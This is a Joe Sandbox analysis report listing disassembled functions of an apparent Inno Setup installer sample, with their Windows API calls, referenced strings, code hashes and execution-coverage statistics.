                                                                                                      • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                      • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                      • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                      APIs
                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                      • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                      Strings
                                                                                                      • Extracting temporary file: , xrefs: 004763EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileTime$Local
                                                                                                      • String ID: Extracting temporary file:
                                                                                                      • API String ID: 791338737-4171118009
                                                                                                      • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                      • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                      • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                      • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                      Strings
                                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                      • API String ID: 0-1974262853
                                                                                                      • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                      • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                      • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                      • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                      Strings
                                                                                                      • %s\%s_is1, xrefs: 00478F10
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1598650737
                                                                                                      • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                      • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                      • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                      • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMessageSendShell
                                                                                                      • String ID: open
                                                                                                      • API String ID: 812272486-2758837156
                                                                                                      • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                      • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                      • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                      • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                      APIs
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                      • String ID: <
                                                                                                      • API String ID: 893404051-4251816714
                                                                                                      • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                      • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                      • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                      • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                      • String ID: )
                                                                                                      • API String ID: 2227675388-1084416617
                                                                                                      • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                      • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                      • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                                      • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window
                                                                                                      • String ID: /INITPROCWND=$%x $@
                                                                                                      • API String ID: 2353593579-4169826103
                                                                                                      • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                      • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                      • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                      • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                                      • API String ID: 3952431833-1023667238
                                                                                                      • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                      • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                      • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                      • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                      • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                        • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                                      • String ID: 0nI
                                                                                                      • API String ID: 3798668922-794067871
                                                                                                      • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                      • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                      • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                      • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$EnumQuery
                                                                                                      • String ID: Inno Setup: No Icons
                                                                                                      • API String ID: 1576479698-2016326496
                                                                                                      • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                      • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                      • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                      • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesErrorFileLast
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 1799206407-488339322
                                                                                                      • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                      • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                      • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                      • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                      APIs
                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 2018770650-488339322
                                                                                                      • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                      • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                                      • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                                      • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                                      APIs
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                      • String ID: T$H
                                                                                                      • API String ID: 377330604-488339322
                                                                                                      • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                      • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                      • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                      • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(740E0000,00481A2F), ref: 0047D0E2
                                                                                                        • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                        • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                      Strings
                                                                                                      • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                      • String ID: Detected restart. Removing temporary directory.
                                                                                                      • API String ID: 1717587489-3199836293
                                                                                                      • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                      • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                      • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                      • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                      • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                      • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                                      • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.1%
                                                                                                      Dynamic/Decrypted Code Coverage:67.2%
                                                                                                      Signature Coverage:18.7%
                                                                                                      Total number of Nodes:481
                                                                                                      Total number of Limit Nodes:28
